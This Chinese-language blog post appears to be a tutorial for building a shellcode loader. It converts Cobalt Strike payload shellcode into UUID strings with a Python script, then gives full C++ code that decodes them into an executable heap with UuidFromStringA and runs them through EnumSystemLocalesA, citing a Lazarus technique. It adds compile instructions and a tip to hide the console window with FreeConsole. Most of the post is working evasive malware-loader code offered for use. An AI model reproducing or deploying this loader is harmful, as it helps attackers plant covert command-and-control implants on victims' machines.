参考文章
RIFT: Analysing a Lazarus Shellcode Execution Method
生成uuid
使用cobaltstrike生成python shellcode
Attacks->Packages->Payload Generator
语言选择python(什么语言都可以),这里选择了生成x64的shellcode
用python将shellcode转为uuid,因为uuid.UUID(bytes_le=u)当中u的长度需要为16字节,所以需要将shellcode进行分组,每组16字节,不足的用\x00补位
1 2 3 4 5 6 7 8
| import uuid shellcode="shellcode" new_shellcode=shellcode+'\x00'*(16-len(shellcode)%16) i=0 while i<len(new_shellcode): u=new_shellcode[i:i+16] print uuid.UUID(bytes_le=u) i+=16
|
将文章代码当中弹计算器的uuid替换为上面生成的uuid,编译C++代码:
编译方式选择:
如果生成的是64位的shellcode,需要使用releases x64位的方式进行编译
如果生成的是32位的shellcode,需要使用releases x86位的方式进行编译
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
| #include <Windows.h> #include <Rpc.h> #include <iostream> #pragma comment(lib, "Rpcrt4.lib") const char* uuids[] = { uuid }; int main() { FreeConsole(); HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); void* ha = HeapAlloc(hc, 0, 0x100000); DWORD_PTR hptr = (DWORD_PTR)ha; int elems = sizeof(uuids) / sizeof(uuids[0]); for (int i = 0; i < elems; i++) { RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr); if (status != RPC_S_OK) { printf("UuidFromStringA() != S_OK\n"); CloseHandle(ha); return -1; } hptr += 16; } printf("[*] Hexdump: "); for (int i = 0; i < elems * 16; i++) { printf("%02X ", ((unsigned char*)ha)[i]); } EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0); CloseHandle(ha); return 0; }
|
效果:
可以使用FreeConsole()函数隐藏控制台
